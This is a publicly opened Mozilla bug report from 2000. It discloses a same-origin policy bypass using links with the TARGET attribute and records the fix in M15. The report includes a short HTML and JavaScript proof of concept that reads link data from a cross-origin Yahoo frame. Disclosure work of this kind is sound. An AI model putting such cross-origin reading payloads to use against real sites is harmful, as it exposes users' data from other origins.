links and TARGET vulnerability

VERIFIED FIXED in M15

Status

()

P3
normal
VERIFIED FIXED
19 years ago
12 years ago

People

(Reporter: norrisboyd, Assigned: norrisboyd)

Tracking

Trunk
x86
Windows NT
Points:
---
Bug Flags:
in-testsuite ?

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: Fix in hand, URL)

(Assignee)

Description

19 years ago
Subject: 
        BUG: links and TARGET vulnerability
   Date: 
        Mon, 13 Mar 2000 16:03:28 +0200
   From: 
        Georgi Guninski <joro@nat.bg>
     To: 
        Norris Boyd <norris@netscape.com>




It is possible to circumvent Same Origin security policy using links and
the TARGET attribute.
The problems are links like <A HREF="hostile" TARGET="victim"> which
modify the location of the current window to hostile when clicked.
The code is:
---------------------------------------------------
Wait until the IFRAME is loaded:
<IFRAME SRC="http://www.yahoo.com"></IFRAME>
<BR>
<A HREF="http://www.yahoo.com" TARGET="a">Click me first</A>
<BR>
<A
HREF="javascript:window.frames[0].alert(window.frames[0].document.links[0].href)
"
TARGET="a">Click me to see the first link from Yahoo</A>
---------------------------------------------------
(Assignee)

Updated

19 years ago
Status: NEW → ASSIGNED
Target Milestone: M15
(Assignee)

Updated

19 years ago
Keywords: beta2
(Assignee)

Updated

19 years ago
Whiteboard: Fix in hand
(Assignee)

Comment 1

19 years ago
Fixed.
Status: ASSIGNED → RESOLVED
Last Resolved: 19 years ago
Resolution: --- → FIXED

Comment 2

19 years ago
Verified fixed.
Status: RESOLVED → VERIFIED

Updated

19 years ago
Keywords: nsbeta2
Opening fixed security bugs to the public.
Group: netscapeconfidential?

Updated

13 years ago
Flags: testcase+

Updated

12 years ago
Flags: in-testsuite+ → in-testsuite?
You need to log in before you can comment on or make changes to this bug.